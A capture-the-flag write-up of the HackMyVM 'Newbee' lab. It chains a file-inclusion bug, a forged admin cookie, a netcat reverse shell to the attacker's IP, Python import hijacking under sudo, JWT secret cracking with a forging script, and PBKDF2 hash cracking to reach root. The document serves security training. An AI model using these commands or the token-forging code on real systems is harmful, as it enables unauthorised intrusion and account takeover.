
Hackmyvm-Newbee

Information gathering

arp-scan -l

┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1 0a:00:27:00:00:11 (Unknown: locally administered)
192.168.31.2 08:00:27:f5:b9:af PCS Systemtechnik GmbH
192.168.31.122 00:0c:29:71:20:21 VMware, Inc.

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.384 seconds (107.38 hosts/sec). 3 responded

192.168.31.122 is the target's IP address.

Scan all TCP ports with nmap 192.168.31.122 -p-:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.122 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-26 08:21 EDT
Nmap scan report for 192.168.31.122
Host is up (0.00090s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:71:20:21 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 6.71 seconds

Port 80

Viewing the page source, there is a comment at the very bottom:

<!--Wrong paramter to GET-->

Fuzz the GET parameter name, hiding the default 18851-character response with --hh:


┌──(root㉿kali)-[~/Desktop/tmp]
└─# wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u "http://192.168.31.122?FUZZ=/etc/passwd" --hh 18851
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.31.122?FUZZ=/etc/passwd/
Total requests: 220559

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000001799: 200 376 L 1270 W 18863 Ch "hack"

The fuzz finds the parameter name hack (the response grows from 18851 to 18863 characters), but the bottom of the page still shows an error:

<!-- include failed try another file -->

So other files can be included. A directory scan also finds a secret.php:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# gobuster dir -u "http://192.168.31.122/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.31.122/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/index.php (Status: 200) [Size: 18852]
/contact.php (Status: 200) [Size: 8853]
/about.php (Status: 200) [Size: 10036]
/blog.php (Status: 200) [Size: 9782]
/products.php (Status: 200) [Size: 12163]
/terms.php (Status: 200) [Size: 6670]
/assets (Status: 301) [Size: 317] [--> http://192.168.31.122/assets/]
/testimonials.php (Status: 200) [Size: 7907]
/javascript (Status: 301) [Size: 321] [--> http://192.168.31.122/javascript/]
/checkout.php (Status: 200) [Size: 13307]
/secret.php (Status: 200) [Size: 2187]
/.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]

secret.php can execute commands, but only after an authorization check. Use the LFI to read secret.php through the php://filter wrapper:

http://192.168.31.122/?hack=php://filter/convert.base64-encode/resource=secret.php

The wrapper returns the file base64-encoded; decoding it gives the source:

#secret.php
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>命令行控制台</title>
<style>
body {
background-color: #1e1e1e;
font-family: Consolas, monospace;
color: #fff;
margin: 0;
padding: 0;
}

.console {
width: 80%;
margin: 50px auto;
padding: 20px;
background-color: #000;
border-radius: 8px;
box-shadow: 0 4px 10px rgba(0, 0, 0, 0.5);
height: 400px;
overflow-y: auto;
font-size: 16px;
}

.output {
white-space: pre-wrap;
margin-bottom: 10px;
}

.input-container {
display: flex;
align-items: center;
}

.input-container .prompt {
color: #00ff00;
margin-right: 5px;
}

.input-container input {
background: transparent;
border: none;
color: #fff;
width: 100%;
padding: 5px;
font-size: 16px;
outline: none;
}

.input-container input:focus {
border: 1px solid #00ff00;
}

.input-container input::placeholder {
color: #888;
}

.console-footer {
padding-top: 10px;
color: #888;
font-size: 12px;
text-align: center;
}
</style>
</head>
<body>

<div class="console">
<div class="output" id="output">
<?php

if (isset($_COOKIE['AreYouAdmin']) && $_COOKIE['AreYouAdmin'] === 'Yes') {

if (isset($_GET['command'])) {
$command = $_GET['command'];
$output = shell_exec($command);
echo '<div>\> ' . htmlspecialchars($command) . '</div>';
echo '<div>' . nl2br(htmlspecialchars($output)) . '</div>';
}
} else {
echo '<div>No permission to execute commands, lacking admin permission.</div>';
}
?>
</div>

<div class="input-container">
<span class="prompt">\></span>
<form method="get">
<input type="text" name="command" id="input" placeholder="command..." autocomplete="off">
</form>
</div>
</div>

<script>
const inputField = document.getElementById("input");

inputField.focus();
</script>

</body>
</html>

Forge the cookie. The check is a strict comparison against 'Yes', so the value is case-sensitive:

Cookie: AreYouAdmin=Yes

Then, with a listener waiting on the attacking machine (nc -lvnp 4444), spawn a reverse shell through the command parameter and upgrade it:

nc -e /bin/bash 192.168.31.129 4444
script -qc /bin/bash /dev/null   # run inside the reverse shell to get an interactive shell

Privilege escalation

www-data@Newbee:/var/www/html/shop$ sudo -l
sudo: unable to resolve host Newbee: Temporary failure in name resolution
Matching Defaults entries for www-data on Newbee:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
targetpw, use_pty

User www-data may run the following commands on Newbee:
(debian) NOPASSWD: /usr/bin/python3 /var/www/html/vuln.py

#vuln.py
import random
import time
import math
import string
import datetime

def generate_random_string(length=10):
    return ''.join(random.choices(string.ascii_letters + string.digits, k=length))

def pointless_computation():
    number = random.randint(1, 1000)
    result = math.sqrt(number) * math.log(number)
    print(f"Calculated math nonsense: sqrt({number}) * log({number}) = {result}")

def simulate_time_wasting():
    now = datetime.datetime.now()
    print(f"Started wasting time at {now}")
    time.sleep(2)  # deliberately sleep for 2 seconds
    later = datetime.datetime.now()
    print(f"Finished wasting time at {later}. Time wasted: {later - now}")

def pointless_string_operations():
    rand_str = generate_random_string()
    print(f"Generated random string: {rand_str}")
    reversed_str = rand_str[::-1]
    print(f"Reversed string: {reversed_str}")
    print(f"String length: {len(rand_str)}")

if __name__ == "__main__":
    pointless_computation()
    simulate_time_wasting()
    pointless_string_operations()
    print("All done. The script accomplished nothing useful.")

The script's first statement is import random, and /var/www/html is writable by www-data, so create a random.py there to hijack the import. Python puts the directory of the script being executed at the front of sys.path (it is the script's directory, not the caller's working directory), so a random.py next to vuln.py is loaded instead of the standard-library module:

#random.py
import os
os.system("bash -p")   # executed as debian as soon as vuln.py's "import random" picks this file up
www-data@Newbee:/var/www/html$ sudo -u debian /usr/bin/python3 /var/www/html/vuln.py
debian@Newbee:/var/www/html$

That gives us the debian user. The home directory holds a note.txt and a config.php:

debian@Newbee:~$ cat note.txt
Damn it, I forgot my database password. I heard that Debian is currently building a message board, maybe he can help me
debian@Newbee:~$ cat config.php
<?php
$servername = "localhost";
$username = "root";
$password = "


$conn = new mysqli($servername, $username, $password);

............
............

So we need the database password.

Check the listening ports:

debian@Newbee:~$ ss -lntup
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:5000 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 511 *:80 *:*

Port 5000 is only listening on 127.0.0.1. Forward it with socat so it is reachable from the attacking machine on port 5001:

debian@Newbee:~$ socat TCP-LISTEN:5001,fork TCP4:127.0.0.1:5000

It is a message board. At the login page any username other than admin can be used to log in, and the session cookie is a JWT, so forging the token is the obvious route.

The HS256 signing secret can be brute-forced with hashcat (mode 16500) against the token saved in a file (here ./1):

┌──(root㉿kali)-[~/Desktop/tmp]
└─# hashcat -a 0 -m 16500 ./1 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-12th Gen Intel(R) Core(TM) i5-12500H, 2917/5898 MB (1024 MB allocatable), 8MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 2 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IjEyMzEyMyIsImV4cCI6MTc0MzAyNTM4OH0.qTMF9XS0BYo7nKIDg9rFr1qmUfR4btXsLS7GZv2QVW4:noob

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 16500 (JWT (JSON Web Token))
Hash.Target......: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZS...v2QVW4
Time.Started.....: Wed Mar 26 08:44:45 2025 (3 secs)
Time.Estimated...: Wed Mar 26 08:44:48 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2052.7 kH/s (0.87ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 5025792/14344385 (35.04%)
Rejected.........: 0/5025792 (0.00%)
Restore.Point....: 5021696/14344385 (35.01%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: noobface888 -> nona1807
Hardware.Mon.#1..: Util: 44%

Started: Wed Mar 26 08:44:44 2025
Stopped: Wed Mar 26 08:44:49 2025

noob is the signing secret. Re-signing the token with the username set to admin gives the admin view of the board, which is where the database password comes from:

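The crack-and-forge step, as an added Python example that is not part of the original writeup: it decodes the token from the hashcat output above, runs the same dictionary attack that hashcat -m 16500 performs (against a constructed five-word list standing in for rockyou.txt), and re-signs the original claims with username admin. Only the standard library is used. The page does not show which cookie the board reads the token from, so the forged token is simply returned for you to put in that cookie in place of the original.

```python
import base64
import hashlib
import hmac
import json
import time

# Token copied from the hashcat output above (issued to the user "123123").
TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
         "eyJ1c2VybmFtZSI6IjEyMzEyMyIsImV4cCI6MTc0MzAyNTM4OH0."
         "qTMF9XS0BYo7nKIDg9rFr1qmUfR4btXsLS7GZv2QVW4")

# Constructed mini wordlist standing in for rockyou.txt.
WORDLIST = ["password", "123456", "secret", "noob", "admin"]


def b64url_decode(s: str) -> bytes:
    # JWT segments drop the '=' padding; restore it before decoding.
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode("ascii")


def decode_jwt(token: str):
    """Split a JWT into (header, payload, signature) WITHOUT verifying it."""
    h, p, s = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p)), b64url_decode(s)


def hs256_verify(token: str, secret: str) -> bool:
    """HS256 check: HMAC-SHA256 over the public 'header.payload' string."""
    h, p, s = token.split(".")
    expected = hmac.new(secret.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(s))


def crack_hs256(token: str, candidates):
    """Offline dictionary attack: the same work hashcat -m 16500 does."""
    for word in candidates:
        if hs256_verify(token, word):
            return word
    return None


def forge_hs256(payload: dict, secret: str) -> str:
    """Mint a fresh HS256 token for arbitrary claims with a known secret."""
    header = {"alg": "HS256", "typ": "JWT"}
    h = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
    return f"{h}.{p}.{b64url_encode(sig)}"


def forge_admin_token(secret: str, lifetime: int = 3600) -> str:
    """Keep the original claim layout, swap the username, refresh exp."""
    _, payload, _ = decode_jwt(TOKEN)
    payload["username"] = "admin"
    payload["exp"] = int(time.time()) + lifetime
    return forge_hs256(payload, secret)


if __name__ == "__main__":
    header, payload, _ = decode_jwt(TOKEN)
    print("header :", header)
    print("payload:", payload)
    secret = crack_hs256(TOKEN, WORDLIST)
    print("secret :", secret)                       # noob
    admin_token = forge_admin_token(secret)
    print("forged :", admin_token)
    print("verifies with cracked secret:", hs256_verify(admin_token, secret))
```

The attack and the defence are both visible in hs256_verify: the signing input is public, so the only thing standing between an attacker and a token for any username is the entropy of the secret, and a dictionary word such as noob falls in seconds. A long random secret (or an asymmetric algorithm with the private key kept off the web host) is the fix; the board's check that rejects admin at the login form is irrelevant once the token can be minted directly.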
debian@Newbee:~$ mysql -uroot -pTheStrongestPasswordHYHcreated
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 5
Server version: 10.11.6-MariaDB-0+deb12u1 Debian 12

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

No entry for terminal type "unknown";
using dumb terminal settings.
No entry for terminal type "unknown";
using dumb terminal settings.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

The user table in the user database holds debian's password hash:

Database changed
MariaDB [user]> select * from user;
+----+----------+--------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------+
| id | username | passwd                                                                                                                   | salt                             | passwd_hash_algo |
+----+----------+--------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------+
|  1 | debian   | 2c082e3ff2ca15e3b24f815d70653f0dead09534495069dd140e19adb2d117266cc4b1de8daf55c7c4827a0a5ccf70c6f537ffc4ddc74db4865c41c0 | 8bf3e3452b78544f8bee9400d6936d34 | pbdf2$50500$60   |
+----+----------+--------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------+
1 row in set (0.001 sec)

For cracking the PBKDF2 hash see https://notes.benheater.com/books/hash-cracking/page/pbkdf2-hmac-sha256: hashcat mode 10900 expects sha256:<iterations>:<base64 salt>:<base64 hash>, so the hex salt and hash from the table are converted to base64 and written to a file (here ./2):

┌──(root㉿kali)-[~/Desktop/tmp]
└─# cat 2
sha256:50500:i/PjRSt4VE+L7pQA1pNtNA==:LAguP/LKFeOyT4FdcGU/DerQlTRJUGndFA4ZrbLRFyZsxLHeja9Vx8SCegpcz3DG9Tf/xN3HTbSGXEHA
┌──(root㉿kali)-[~/Desktop/tmp]
└─# hashcat -a 0 ./2 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode

OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-12th Gen Intel(R) Core(TM) i5-12500H, 2917/5898 MB (1024 MB allocatable), 8MCU

Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

10900 | PBKDF2-HMAC-SHA256 | Generic KDF

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

INFO: All hashes found as potfile and/or empty entries! Use --show to display them.

Started: Wed Mar 26 08:49:58 2025
Stopped: Wed Mar 26 08:49:59 2025
┌──(root㉿kali)-[~/Desktop/tmp]
└─# hashcat ./2 --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

10900 | PBKDF2-HMAC-SHA256 | Generic KDF

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

sha256:50500:i/PjRSt4VE+L7pQA1pNtNA==:LAguP/LKFeOyT4FdcGU/DerQlTRJUGndFA4ZrbLRFyZsxLHeja9Vx8SCegpcz3DG9Tf/xN3HTbSGXEHA:1qaz2wsx

The home directory also contains a .secret directory with a password-protected zip:

debian@Newbee:~$ cd .secret/
debian@Newbee:~/.secret$ ls
hint.txt password.zip
debian@Newbee:~/.secret$ cat hint.txt
password is md5(key)

and key is in mysql!!!!!!

The zip password is the md5 of 1qaz2wsx.

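The conversion to hashcat's 10900 format and the md5 step for the zip, as an added Python example that is not taken from the writeup: it takes the salt, hash and algorithm label exactly as stored in the user table, emits the sha256:iterations:base64salt:base64hash line used above, checks a candidate password with hashlib.pbkdf2_hmac, and derives the zip password from the cracked key. Reading the label pbdf2$50500$60 as "50500 iterations, 60-byte derived key" is an assumption about the board's storage format; it is consistent with the 120-hex-character hash.

```python
import base64
import hashlib
import hmac

# Values copied from the user table above (not constructed).
PASSWD_HEX = ("2c082e3ff2ca15e3b24f815d70653f0dead09534495069dd140e19adb2d117266"
              "cc4b1de8daf55c7c4827a0a5ccf70c6f537ffc4ddc74db4865c41c0")
SALT_HEX = "8bf3e3452b78544f8bee9400d6936d34"
ALGO_LABEL = "pbdf2$50500$60"


def parse_algo(label: str):
    """Assumed reading of the stored label: <name>$<iterations>$<dklen bytes>."""
    _name, iterations, dklen = label.split("$")
    return int(iterations), int(dklen)


def to_hashcat_10900(salt_hex: str, hash_hex: str, iterations: int) -> str:
    """hashcat -m 10900 takes sha256:<iter>:<base64 salt>:<base64 derived key>."""
    salt_b64 = base64.b64encode(bytes.fromhex(salt_hex)).decode("ascii")
    hash_b64 = base64.b64encode(bytes.fromhex(hash_hex)).decode("ascii")
    return f"sha256:{iterations}:{salt_b64}:{hash_b64}"


def derive(password: str, salt_hex: str, iterations: int, dklen: int) -> str:
    """PBKDF2-HMAC-SHA256 as hex, the primitive the stored hash was made with."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(),
                               bytes.fromhex(salt_hex), iterations, dklen).hex()


def check_password(password: str, salt_hex: str, hash_hex: str, iterations: int) -> bool:
    """Recompute the full derived key (dklen taken from the stored hash) and
    compare in constant time, which is what the board's login would do."""
    derived = derive(password, salt_hex, iterations, len(hash_hex) // 2)
    return hmac.compare_digest(derived, hash_hex)


def zip_password_from_key(key: str) -> str:
    """hint.txt says the archive password is md5(key)."""
    return hashlib.md5(key.encode()).hexdigest()


if __name__ == "__main__":
    iterations, dklen = parse_algo(ALGO_LABEL)
    print(to_hashcat_10900(SALT_HEX, PASSWD_HEX, iterations))   # contents of ./2
    print("1qaz2wsx matches:", check_password("1qaz2wsx", SALT_HEX, PASSWD_HEX, iterations))
    print("zip password    :", zip_password_from_key("1qaz2wsx"))
```

50500 iterations is a reasonable work factor, which is why a single check takes tens of milliseconds; the hash still fell because the password itself is a keyboard walk that sits early in rockyou.txt. The iteration count only multiplies the cost of each guess, it does not replace a strong password.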
Inside is an image that has been pixelated (mosaicked); there is a public project for recovering text from such images:

https://github.com/spipm/Depixelization_poc

It does not even need to be run: the picture is the sample image from that project's own README.

The password it hides is hellofromtheotherside, which is root's:

debian@Newbee:/tmp$ su - root
Password:
root@Newbee:~#